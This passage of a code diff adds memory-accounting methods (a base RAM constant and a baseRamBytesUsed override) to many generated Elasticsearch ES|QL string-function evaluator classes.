*/ public final class AutomataMatchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AutomataMatchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator input; @@ -58,6 +61,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += input.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock inputBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef inputScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java index b7fc1d5f84ad4..c24d6bfecda67 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class BitLengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(BitLengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock valBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java index 93c264a2e5b87..ee11e877388d3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class ByteLengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ByteLengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock valBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java index b703013654295..b4130114797bc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java @@ -8,6 +8,7 @@ import java.lang.String; import java.util.Locale; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ChangeCaseEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ChangeCaseEvaluator.class); + private final EvalOperator.ExpressionEvaluator val; private final Locale locale; @@ -128,6 +131,13 @@ public void close() { Releasables.closeExpectNoException(val); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java index 9d22936ba7d02..5738f81040bec 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java @@ -10,6 +10,7 @@ import java.util.Arrays; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class ConcatEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ConcatEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -63,6 +66,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock[] valuesBlocks) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef[] valuesValues = new BytesRef[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java index f9b96479e87a4..56140d4f193c0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EndsWithEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EndsWithEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += suffix.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock suffixBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java index 6eac2084410c8..88096c576db8f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class HashConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(HashConstantEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -58,6 +61,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += input.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock inputBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef inputScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java index aee3d333fd517..074fb0f0ea194 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashEvaluator.java @@ -10,6 +10,7 @@ import java.security.NoSuchAlgorithmException; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class HashEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(HashEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -65,6 +68,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += algorithm.baseRamBytesUsed(); + baseRamBytesUsed += input.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock algorithmBlock, BytesRefBlock inputBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java index ce46bad9159f5..761bd24d5dd6f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LTrimEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LTrimEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LTrimEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java index 443d41a7c9ff2..36d228e8be076 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LeftEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.UnicodeUtil; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeftEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeftEvaluator.class); + private final Source source; private final BytesRef out; @@ -69,6 +72,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += length.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock lengthBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java index cbfcc4f81221c..5fa536b4da617 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LengthEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock valBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java index afbd759f4bbb8..de46bb4162884 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LocateEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LocateEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -70,6 +73,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += substr.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock substrBlock, IntBlock startBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java index 5c015d2a04f6f..e2330cbe5cf49 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/LocateNoStartEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LocateNoStartEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LocateNoStartEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += substr.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock substrBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java index 9b4a5a4165b42..b0e1aeb9ed66e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RTrimEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RTrimEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RTrimEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java index c0799f7187322..e24597090f69c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RepeatConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RepeatConstantEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java index 169df1f7faaae..5ec3fee744126 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RepeatEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RepeatEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RepeatEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -66,6 +69,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += number.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock numberBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java index f63966810a5fe..f74678ba45630 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.regex.Pattern; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
  */
 public final class ReplaceConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ReplaceConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -62,6 +65,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += newStr.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock newStrBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef strScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java
index 6eb3aa898b79c..5da95c21bd623 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReplaceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ReplaceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ReplaceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -68,6 +71,15 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += regex.baseRamBytesUsed();
+    baseRamBytesUsed += newStr.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock regexBlock,
       BytesRefBlock newStrBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java
index 5dbcc7c38d90b..367c0362c13c3 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ReverseEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ReverseEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ReverseEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) {
